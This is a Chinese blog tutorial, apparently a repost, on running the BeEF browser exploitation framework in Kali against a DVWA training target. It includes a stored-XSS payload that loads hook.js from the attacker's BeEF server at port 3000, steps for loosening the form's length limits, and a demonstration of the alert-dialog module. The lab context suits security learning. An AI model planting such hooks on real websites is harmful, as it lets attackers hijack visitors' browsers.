当前位置:   article > 正文

Kali中Beef的使用教程_kali beef

kali beef

项目场景:

Kali中Beef的使用教程

情景复现:

实验环境:Kali-Debian 6 64位、Windows10

环境版本
kaliDebain6 64位
windowsWin10 64位
靶场DVWA

实验过程:

以下实验是利用Kali自带的Beef来进行的(不同Linux版本可能会出现一些差异)
1、打开kali终端,键入beef-xss(确保你的kali是可以上网的,本人的kali出现一些问题,没有网络)
2、进入/usr/share/beef-xss下(可以手动敲命令,也可以在kali计算机下找到这个目录),终端进入输入命令./beef(注意这个点)
3、查看kali的IP信息等(红线框里面的)
4、稍等一下kali自带浏览器会打开Beef登录窗口

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

5、弹窗登录,账号:beef,密码:beef

在这里插入图片描述

6、登录win10下DVWA靶场(前提是在PHP小皮工具根目录下有DVWA-master,没有的请自行上网下载、配置等)
7、网上有很多说法是Beef需要靶机的浏览器是IE8以下,所以现在把靶场的级别调至Low等级(看红框位置)

在这里插入图片描述

8、在XSS(Stored)下输入脚本命令
Name:ceshi(自己取一个名字)
Message:<script src="http://192.xxx.xxx.xxx(自己的kaliIP地址):3000/hook.js"></script>(可复制)
10、这里的文本框初始的时候有字数限制,我们需要进行修改,网上有直接F12进行修改的,这里采用找到登录页面index.php文件修改,Name文本修改成100字符,Message修改成500字符(这样就足够复制命令了)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

11、点击Sign Guestbook,kali那边Beef就勾上了靶机所在的浏览器了
12、打开kali,依次点击
13、简单介绍弹窗攻击:Create Alert Dialog,在该模块下输入一些信息,执行后,靶场所在浏览器会出现弹窗。

![在这里插入图片描述](https://img-blog.csdnimg.cn/e02d6c19d1a141668cc46d3ef6c85c38.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bq35pmu6aG_5YuS,size_20,color_FFFFFF,t_70,g_se,x_16在这里插入图片描述

![在这里插入图片描述](https://img-blog.csdnimg.cn/7bcfd51d2b4148e9a2747ac9fdc2f710.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bq35pmu6aG_5YuS,size_20,color_FFFFFF,t_70,g_se,x_16在这里插入图片描述

![在这里插入图片描述](https://img-blog.csdnimg.cn/762550fdc3f7407c8f7de8be05ba369c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bq35pmu6aG_5YuS,size_20,color_FFFFFF,t_70,g_se,x_16在这里插入图片描述

14、至此,恭喜你完成了该模块的学习(Beef里面的模块还有很多,值得大家去官网以及其他博主等那里好好看看)


心得体会:

漏洞复现需要耐心,遇到问题需要不停的查阅网络资料!持之以恒的做,相信自己,也相信看文章的你一定会有所收获!

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/羊村懒王/article/detail/420801
推荐阅读
相关标签
  

闽ICP备14008679号